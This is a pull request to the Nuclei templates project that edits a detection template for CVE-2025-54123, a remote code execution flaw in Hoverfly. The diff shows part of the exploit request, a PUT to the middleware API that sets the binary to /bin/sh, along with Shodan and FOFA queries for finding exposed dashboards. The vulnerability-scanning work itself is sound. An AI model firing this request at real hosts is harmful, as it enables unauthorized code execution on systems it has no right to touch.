### PR TITLE
add CVE-2025-54123 - Hoverfly RCE vulnerability details

### DIFF
--- a/http/cves/2025/CVE-2025-54123.yaml
+++ b/http/cves/2025/CVE-2025-54123.yaml
@@ -11,14 +11,14 @@ info:
     - https://github.com/SpectoLabs/hoverfly/security/advisories/GHSA-r4h8-hfp2-ggmf
   metadata:
     verified: true
+    max-requests: 1
     shodan-query:
       - http.favicon.hash:1357234275
       - title:"Hoverfly Dashboard"
     fofa-query:
       - icon_hash="1357234275"
       - title="Hoverfly Dashboard"
-    max-requests: 1
-  tags: icve,cve2025,hoverfly,rce,intrusive
+  tags: cve,cve2025,hoverfly,rce,intrusive
 
 http:
   - raw:
@@ -26,7 +26,6 @@ http:
         PUT /api/v2/hoverfly/middleware HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/json
-        Content-Length: 61
 
         {
           "binary": "/bin/sh",


### PR DESCRIPTION
### Template / PR Information
<img width="748" height="297" alt="image" src="https://github.com/user-attachments/assets/1ba7c450-ae50-40d0-8282-8657ef97134b" />

i used docker image that Hoverfly v.1.11.3
- Added CVE-2025-54123
- References:
    - https://github.com/advisories/GHSA-r4h8-hfp2-ggmf
    - https://nvd.nist.gov/vuln/detail/CVE-2025-54123
### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)